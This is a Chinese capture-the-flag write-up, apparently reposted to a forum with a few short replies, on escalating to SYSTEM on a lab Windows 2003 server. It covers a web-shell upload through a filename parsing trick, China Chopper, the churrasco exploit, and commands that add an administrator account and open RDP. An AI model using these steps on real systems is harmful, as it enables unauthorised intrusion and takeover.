從資訊搜集到系統提權的一次完美攻擊--第六章:SYSTEM!POWER!提權
一、序言
本人是計算機愛好者,覺得這個實驗是一個比較完整的一次web攻擊,想將它分享給和我一樣的愛好者,同時是我的一次筆記。表達不到之處請留言。
二、平臺及其使用工具
實驗平臺:封神臺https://hack.zkaq.cn/battle/target?id=3eb7bec4a7e95297
實驗環境:win2003(也可以是其它,一定要關閉安全防護軟體,如360)
實驗工具:中國菜刀:
巴西烤肉(churrasco )
下載鏈接:鏈接:https://pan.baidu.com/s/1uWrlqAKmZDXZPW7GP5j-ng
提取碼:dflp
復制這段內容后打開百度網盤手機App,操作更方便哦
三、簡要概述思路
1.首先用上一題竊取到的cookie值上傳到瀏覽器中,使得成功登陸
2.由于題目提示要獲得系統權限,那么我們首先要進入網站后臺,再想辦法提權
3.找到上傳漏洞,上傳一句話木馬,使用中國菜刀鏈接后臺。
4.開始提升權限,在網站后臺上上傳系統的cmd
5.權限不夠大,繼續上傳巴西烤肉,將權限提至最高
6.創建管理員賬號
7.遠程登陸
8.獲得flag
四、實驗步驟
1.打開網頁后顯示(上一題做了的沒有這步驟):
這是要用到第四題中獲取到的cookie來登陸管理員頁面ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
我用的是火狐,F12,找到存盤中的cookie,將上面的cookie添加到里面,=前面的為名稱后面的為值,添加后F5重繪:
登陸成功后顯示以下界面:
2.尋找上傳漏洞,我找到了兩處可上傳的地方:
3.嘗試上傳一句話木馬,上傳失敗,彈出:
4.嘗試以圖片格式上傳一句話木馬(用到決議漏洞),(也可使用cer漏洞上傳,只需將后綴修改為.cer)將ma.txt 修改為ma.jsp;ma.jpg格式,注意檔案太小不能上傳,一個圖片大小至少1k,而txt為kb,所以要將一句話木馬多寫幾遍,以達到圖片大小:
5.拼接IP,使用中國菜刀鏈接,圖片地址相對路徑已經顯示出來了(上傳成功后會在圖片地址顯示),在前面加上網址,就是該圖片保存的位置了,及http://59.63.200.79:8005/UploadFiles/20204138204292.jpg
6.使用中國菜刀鏈接,鏈接成功
7.嘗試打開flag,提示權限不夠,那么我們開始提升權限。
8.右擊添加的網址,打開中國菜刀的虛擬終端:
嘗試創建用戶“net user hack 123 /add”提示權限不夠,這是因為這個終端根本沒有權限,一般的終端都在系統盤下面,所以我們上傳我們系統上的終端
9.上傳終端,由于我們沒有權限,所以很難找到上傳入口,但有一個地方幾乎是人人可以上傳的,回收站,檔案名為RECYCLER,將我們的cmd上傳
10.再打開上傳cmd的虛擬終端,運行一些代碼,發現可以運行非管理員權限的功能,向創建新用戶這些功能還是無法運行
,那么我們繼續想辦法提升權限
11.上傳巴西烤肉或者pr工具:
12.在終端中切換到巴西烤肉的根目錄中:
13.開始創建用戶:churrasco "net user aaa 123 /add"//雙引號里面的內容為 要執行的指令:
14.將創建的用戶添加到管理員組里:churrasco "net localgroup Administrators aaa /add"
15.查看管理組里是否有我們創建的用戶:net localgroup Administrators
16.查看遠程連接埠是否開放(看3389埠是否開放):netstast -an
可以看到遠程鏈接是開著的,如果沒開繼續上傳opens,強制打開3389埠
17.遠程鏈接,回到桌面,運行mstsc:
輸入網站網址
輸入創建的賬號密碼:
鏈接成功
到此一次完美的web滲透結束了!!!!
uj5u.com熱心網友回復:
這是啥年代的事?uj5u.com熱心網友回復:
uj5u.com熱心網友回復:
NICE
uj5u.com熱心網友回復:
圖呢 ·轉載請註明出處,本文鏈接:https://www.uj5u.com/qianduan/38936.html
標籤:JavaScript